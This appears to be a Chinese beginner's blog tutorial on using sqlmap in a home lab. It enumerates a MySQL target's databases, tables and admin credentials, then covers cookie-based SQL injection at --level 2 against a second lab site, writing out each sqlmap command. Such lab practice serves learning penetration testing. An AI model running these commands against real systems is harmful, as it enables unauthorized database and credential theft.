从零开始学安全--第6天

sqlmap cookie注入使用

之前了解了sqlmap的基本使用,注入的是一个Access的数据库(数据库名只能爆破猜解),今天我们在来练习一下MySql的数据库。

首先还是在win7上使用NPMserv来搭建目标网站,在kali里面使用sqlmap,这里询问探测到数据库可能是MySQL,是否需要继续试试其他的数据库类型,我们选no
在这里插入图片描述

这里提示到我们是级别1和风险1的检测,这里可以了解一下

–level 5: 探测等级 参数–level 5
指需要执行的测试等级,一共有5个等级(1~5),可不加level,默认是1.sqlmap使用的Payload可以在xml/payload.xml中 看到,也可以根据相应的格式添加自己的Payload,其中5级包含的Payload最多,会自动破解出cookie、XFF等头注入。当然,level5的运行速度也比较慢 。

这个参数会影响测试的注入点,GET和POST的数据都会进行测试,HTTP cookie在level为2时就会测试,HTTP
User-Agent/Referer头在level为3时就会测试。总之,在不确定哪个Payload或参数为注入点时,为保证全面性,建议使用高得level值。

原文链接:https://blog.csdn.net/zouchengzhi1021/article/details/104838355
在这里插入图片描述

可以看到是MySQL数据库,info_id是注入点,这里可以时间盲注、boolean盲注、union注入
在这里插入图片描述

和Access不一样,MySQL可以直接爆出数据库名,因为有元数据库information_schema:

sqlmap -u “http://192.168.71.131/info_show.php?info_id=140” --dbs

在这里插入图片描述

这里我们可以用 下面的current-db来检测出正在使用的数据库,是govcn

sqlmap -u “http://192.168.71.131/info_show.php?info_id=140”
–current-db

在这里插入图片描述
当前使用的用户,是root

sqlmap -u “http://192.168.71.131/info_show.php?info_id=140” --current-user

在这里插入图片描述

接下来就是查表了

sqlmap -u “http://192.168.71.131/info_show.php?info_id=140” --tables
-D “govcn”

在这里插入图片描述

接着再查admin表的columns

sqlmap -u “http://192.168.71.131/info_show.php?info_id=140” --columns
-T “admin” -D “govcn”
在这里插入图片描述

ok最后再查字段username和password

sqlmap -u “http://192.168.71.131/info_show.php?info_id=140” --dump -C
“username,password” -T “admin” -D “govcn”

在这里插入图片描述
什么是cookie

cookie用于在客户端本地保存用户访问网站时的一些身份验证信息。
比如说上qq邮箱,有个十天内免登录或者免登录选项,这就是利用cookie下次免密码验证来登录。
cookie与get和post方法一样,都可用于客户端向服务器端传递数据。

再用sqlmap感受一下cookie注入,搭建的网站是南方数据5.0,屏蔽掉了get和post的提交,用小旋风搭建,还是一样把文件解压放到AspWebServer目录的wwwroot下.可以看到 post提交的被屏蔽了.

在这里插入图片描述

这里问是否要对cookie进行url编码,我们选择是

sqlmap -u “192.168.71.131/shownews.asp” --cookie “id=25” --level 2

这里使用level 2 是因为sqlmap共有五个等级,默认为1。
级别1,探测GET和POST数据。
级别2,探测Cookie数据。
在这里插入图片描述

这里说cookie 参数的id是可以攻击的,问我们是否要检测其他注入点,选择no
在这里插入图片描述

直接爆一下表名

sqlmap -u “192.168.71.131/shownews.asp” --cookie “id=25” --level 2
–tables

在这里插入图片描述

直接成功爆出表名,这里user肯定是我们关注的
在这里插入图片描述

我们直接来跑一下字段,这里是用字典来爆破的,可以看到我们需要的字段就可以停止了

sqlmap -u “192.168.71.131/shownews.asp” --cookie “id=25” --level 2
–columns -T “user”

在这里插入图片描述
在这里插入图片描述

直接跑一下我们需要的数据

sqlmap -u “192.168.71.131/shownews.asp” --cookie “id=25” --level 2
–dump -C “userid,usename,password” -T “user”

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值